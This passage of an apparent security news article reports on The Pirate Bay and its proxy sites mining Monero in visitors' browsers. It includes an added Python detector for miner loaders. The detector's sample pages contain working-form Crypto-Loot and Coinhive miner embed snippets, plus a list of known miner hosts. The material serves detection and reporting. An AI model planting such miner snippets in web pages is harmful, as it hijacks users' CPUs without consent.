The Pirate Bay has done this before, using the well-known miner Coinhive. This time, though, it seems to have opted for the relatively new cryptojacking service called Crypto-Loot (probably because it charges 12% commission on Monero mining, compared to Coinhive’s 30% commission).

Both Coinhive and Crypto-Loot focus on mining Monero, which has become the cryptocurrency of choice for cryptojackers for two reasons. First, it is CPU-friendly, meaning that miners can use a computer’s CPU in a browser without having to rely on expensive GPU hardware. Second, Monero is designed to be even more anonymous than Bitcoin, obfuscating sending and receiving addresses by default.

The mining script that okremix posted can no longer be found on the Crypto-Loot site. This is because Crypto-Loot recently updated the loader code that connects publishers’ sites to its scripts, changing it to dodge ad blockers; the code it now generates differs slightly.
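That loader change is exactly why a host-based blocklist is a weak check: the constructor the page calls (CRLT.Anonymous above, CoinHive.Anonymous for Coinhive) survives a renamed or self-hosted loader even when the script URL does not. The following added example, which also serves the Coinhive injection cases in the Japanese prosecution story above, scans page HTML for those constructors and pulls out the site key and throttle. It is not Sophos’s scanner or the blocker the article used; the constructor map, the known-host list and the throttle semantics (fraction of time the miner sleeps, as Coinhive documents it and assumed the same for Crypto-Loot) are assumptions of the example, and the sample pages are constructed.

```python
"""Spot browser-miner loaders in page HTML by the constructor they call, not by the script URL.

Added example, not Sophos's scanner or the blocker the article used. The service-to-constructor
map and the known-host list are assumptions drawn from the two services the article names; the
sample pages are constructed. Throttle is read as the fraction of time the miner idles (Coinhive's
documented semantics), assumed the same for Crypto-Loot.
"""
import re

# Constructor names each service's loader exposes. Matching these survives a re-hosted or renamed loader.
MINER_CONSTRUCTORS = {
    "coinhive": r"CoinHive\.(?:Anonymous|User)",
    "crypto-loot": r"CRLT\.Anonymous",
}
# Hosts a URL-based blocklist would key on; a publisher sidesteps these by serving the script itself.
KNOWN_LOADER_HOSTS = {"coinhive.com", "coin-hive.com", "crypto-loot.com"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=[\"']https?://([^/\"']+)", re.I)

def find_miners(html):
    """One finding per miner instantiation: service, site key, throttle and the implied CPU share."""
    findings = []
    for service, ctor in MINER_CONSTRUCTORS.items():
        pattern = re.compile(ctor + r"\s*\(\s*[\"']([0-9A-Za-z]{16,})[\"']\s*(?:,\s*(\{.*?\}))?", re.S)
        for match in pattern.finditer(html):
            options = match.group(2) or ""
            throttle_match = re.search(r"throttle\s*:\s*([0-9]*\.?[0-9]+)", options)
            throttle = float(throttle_match.group(1)) if throttle_match else 0.0
            findings.append({
                "service": service,
                "site_key": match.group(1),
                "throttle": throttle,
                "cpu_share": round(1.0 - throttle, 2),   # no throttle option means full speed
            })
    return findings

def loader_hosts(html):
    """External script hosts on the page, for comparison with a host-based blocklist."""
    return sorted(set(SCRIPT_SRC_RE.findall(html)))

def blocklist_would_catch(html):
    return bool(KNOWN_LOADER_HOSTS & set(loader_hosts(html)))

# Constructed pages. PAGE_TPB reuses the snippet quoted above; PAGE_REHOSTED models a loader moved
# onto the publisher's own CDN, the ad-blocker evasion the article mentions.
PAGE_TPB = """<html><body>
<script src="https://crypto-loot.com/lib/miner.min.js"></script>
<script>
    var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
        throttle:0.9,
    });
    miner.start();
</script></body></html>"""

PAGE_REHOSTED = """<html><body>
<script src="https://static.example-cdn.net/js/analytics.js"></script>
<script>new CoinHive.Anonymous("constructedSiteKeyAAAABBBB").start();</script>
</body></html>"""

PAGE_CLEAN = "<html><body><script src='https://www.example.org/app.js'></script><p>no miner</p></body></html>"

if __name__ == "__main__":
    for name, page in (("tpb", PAGE_TPB), ("rehosted", PAGE_REHOSTED), ("clean", PAGE_CLEAN)):
        print(name, find_miners(page), "blocklist catches:", blocklist_would_catch(page))
```

Run against the re-hosted page, the host check says nothing while the constructor check still finds the miner and reports that, with no throttle set, it would take the whole CPU. Matching on behaviour (an unexpected WebSocket to a mining pool, sustained worker-thread CPU) is more robust still, but needs a running browser rather than a static scan.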

Users responded to the news by questioning the Pirate Bay’s ethics and suggesting that they upload their files elsewhere. Forum admin Sid was less than impressed. He retorted:

Yeah, yeah, whatever. The time it takes to download a torrent is completely and utterly irrelevant.
All you require from TPB is a magnet link. Open the site. Find a torrent. Click the magnet link. Close the site. End of miner.
If you are ever on TPB for more than 5 minutes or so you’re doing it wrong.
And if you’re ever on TPB without an ad blocker you’re doing it doubly wrong.

Quite why Sid, an admin on the official Pirate Bay forum, would trash advertising, one of the group’s big revenue sources, is beyond us. Still, it’s worth looking at how much browser-based cryptomining might earn the organisation.

Only the Pirate Bay’s crew knows its real traffic numbers, but SimilarWeb suggests that it had nearly 200 million users in the last month with an average duration of just over 5 minutes. Plugging that into Crypto-Loot’s profit calculator shows earnings of $511 per day at the current difficulty.

Mind you, that follows a considerable slide in Monero value, which has tracked the broader cryptocurrency market’s downturn in recent months. Had the Pirate Bay been cryptojacking visitors at the height of Monero’s pricing in January, it could have netted well over $1500 each day.

Although stories have been surfacing this week about The Pirate Bay’s use of cryptominers, okremix’s post dates back to 8 June. We checked The Pirate Bay’s main .org site using an unprotected browser in a virtual machine yesterday, and found no cryptomining scripts. We also visited it with a browser using a cryptomining blocker that found nothing.

Does that mean that the Pirate Bay’s electron-hogging practices are done? Don’t bet on it. Yesterday the site introduced a new disclaimer at the bottom:

By entering TPB you agree to XMR being mined using your CPU. If you don’t agree please leave now or install an adBlocker.

When checking for miners and calculating potential profits, let’s also remember the slew of proxy Pirate Bay sites, designed to help users circumvent ISPs that block its main site in their countries. Visitors in these countries can use these sites to reach its lists of magnet links, which it maintains via a cunningly-distributed back-end architecture.

The Pirate Bay maintains a list of these sites, and allows anyone to set up a proxy and submit it for approval. It exercises pretty loose controls, with the only caveats being that people shouldn’t submit generic web proxies or put too many ads on their sites. That makes it pretty easy for an independent proxy creator to mine some cryptocurrency in visitors’ browsers on the side.

We found coin miners on some, but not all, of these proxy sites. One site we visited was using a Coinhive miner, and also added another script which, in spite of the ‘install an adBlocker’ claim at the bottom of the Pirate Bay page, is designed to thwart ad blockers.

We wonder if Sid knows?


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_myj9fOdYnA/